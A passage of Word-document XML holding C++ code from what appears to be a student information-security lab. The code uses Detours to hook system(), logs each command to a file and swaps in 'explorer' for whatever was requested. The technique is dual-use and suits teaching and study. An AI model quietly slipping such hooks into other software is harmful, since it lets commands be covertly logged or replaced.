          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>#include "D:/WorkTable/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>大三下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">信息安全综合实 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/Detours/Detours/include/detours.h"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包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Detour</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">的头文件和库文件 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>#pragma comment (lib,"D:/WorkTable/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>大三下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">信息安全综合实 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/Detours/Detours/lib.X86/detours.lib") </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">using namespace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>std</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保存函数原型 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="008855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">int </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981A1A"/>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Oldsystem</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8855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>system</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拦截后的函数 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="008855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Newsystem</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8855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>command</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ofstream outFile</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outFile</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open</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AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"args.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w: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打开文件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 xml:space="preserve">outFile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>endl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w: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写入操作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outFile</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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w: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关闭文件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Oldsystem</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AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"explorer"</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可以随意更改输入的参数 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pP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下钩子函数 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="008855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>StartHook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">() {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开始事务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DetourTransactionBegin</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更新线程信息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DetourUpdateThread</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GetCurrentThread</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将拦截的函数附加到原函数的地址上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DetourAttach</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981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&amp;</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PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&amp;</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Oldsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Newsystem</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结束事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>DetourTransactionCommit</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撤钩子函数 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="008855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>EndHook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">() {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开始事务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DetourTransactionBegin</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更新线程信息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DetourUpdateThread</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GetCurrentThread</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将拦截的函数从原函数的地址上解除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DetourDetach</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981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&amp;</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PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&amp;</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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Oldsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Newsystem</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结束事务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DetourTransactionCommit</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008855"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>main</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下钩子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StartHook</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system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"notepad"</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AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">撤钩子 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>EndHook</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770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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1F0909"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
